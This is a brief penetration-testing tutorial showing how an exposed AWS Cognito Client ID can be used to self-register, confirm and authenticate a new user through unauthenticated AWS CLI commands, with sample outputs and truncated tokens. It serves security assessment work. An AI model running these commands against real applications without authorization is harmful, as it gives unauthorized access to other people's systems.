Let’s assume you have gained access to a AWS Cognito Client ID during an assessment. Here we will see how we can use that to register a new user in the application using the Client ID.
Use the following command to sign-up for a new user.
# aws cognito-idp sign-up --client-id 4h7f8g9d0a1b2c3d4e5f6g7h8i9j0k1l --username [email protected] --password Cognito-signup-test@1 --region us-east-1 --no-sign-request
{
"UserConfirmed": false,
"CodeDeliveryDetails": {
"Destination": "7***@e***",
"DeliveryMedium": "EMAIL",
"AttributeName": "email"
},
"UserSub": "98d945d5-543c-4d35-82df-8c5709bbd5a0"
}After executing the above command. There should be an email in your inbox with an OTP to confirm Sign-up. Now use the following command for confirmation.
# aws cognito-idp confirm-sign-up --client-id 4h7f8g9d0a1b2c3d4e5f6g7h8i9j0k1l --username [email protected] --confirmation-code 674209 --no-sign-request --region us-east-1Following command can be used to verify the new user registration.
aws cognito-idp initiate-auth --client-id 4h7f8g9d0a1b2c3d4e5f6g7h8i9j0k1l --auth-flow USER_PASSWORD_AUTH --region us-east-1 --auth-parameters '[email protected],PASSWORD=Cognito-signup-test@1'
{
"ChallengeParameters": {},
"AuthenticationResult": {
"AccessToken": "eyJra...[REMOVED]",
"ExpiresIn": 3600,
"TokenType": "Bearer",
"RefreshToken": "eyJ...[REMOVED]",
"IdToken": "eyJra...[REMOVED]"
}
}More Info: